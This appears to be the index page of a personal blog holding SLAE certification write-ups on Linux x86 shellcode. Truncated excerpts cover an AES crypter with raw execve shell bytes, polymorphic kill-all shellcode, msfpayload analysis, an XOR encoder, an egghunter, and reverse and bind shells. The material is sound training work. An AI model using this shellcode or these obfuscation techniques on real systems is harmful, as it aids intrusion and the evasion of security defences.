-
SLAE Assignment 7: Crypter
This is the last one and it is about writing a crypter/decrypter. I used Python and PyCrypto for this task. The execve shellcode starts a shell. The scripts use AES for encryption and decryption. Here is the code for encryption: encode.py from Crypto.Cipher import AES plain=("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80") obj=AES.new('Passphrase123456', AES.MODE_CBC, 'IVIVIVIVIVI12345') l=len(plain) r=l%16 p=16-r print "offset: "…
-
SLAE Assignment 6: Polymorphic Shellcode
This assignment is about writing polymorphic versions of shellcodes downloaded from shell-storm.org. Kill all Processes Shellcode I want to start with a simple one, a shellcode for killing processes which can be found at http://www.shell-storm.org/shellcode/files/shellcode-212.php. Here is the original assembler code: killall_orig.nasm section .text global _start _start: ; kill(-1, SIGKILL) push byte 37 pop eax…
-
SLAE Assignment 5: Shellcode Analysis
Assignment five is about analyzing three different shellcodes, created with msfpayload for Linux/x86. linux/x86/exec I chose the linux/x86/exec shellcode as the first example. With: $ msfpayload linux/x86/exec cmd="ls" R | ndisasm -u - it is possible to disassemble the shellcode: 00000000 6A0B push byte +0xb 00000002 58 pop eax 00000003 99 cdq 00000004 52 push edx…
-
SLAE Assignment 4: Custom Encoder
This one is about building a custom encoder and decoder. For this I used an insertion / XOR encoder that splits the shellcode into bytes and inserts a random value. The shellcode is then decoded using XOR with the random value. This way, we have a shellcode that has nothing to do with the original…
-
SLAE Assignment 3: Egghunter Demo
This assignment is about writing a working demo of an egghunter. An egghunter is basically a piece of code that searches memory for a code word (the egg). When the egg is found, the egghunter jumps to the address behind the egg and executes the code at this address. For…
-
SLAE Assignment 2: Reverse Shell
What it is about: • Create a Shell_Reverse_TCP shellcode – Reverse connects to configured IP and Port – Execs shell on successful connection • IP and Port should be easily configurable Here is the C code I used for prototyping the assembler code: reverseshellds.c #include <unistd.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> int main(void) {…
-
SLAE Assignment 1: Bind Shell
What it is about: • Create a Shell_Bind_TCP shellcode – Binds to a port – Execs Shell on incoming connection • Port number should be easily configurable Here is the C code for the bind shell; I used it for modelling the assembler code: bindshellds.c #include <unistd.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> int main(void)…
-
Welcome
This blog was created mainly for my SLAE certification. More profiles: Blog in German, Twitter, Xing profile, GIT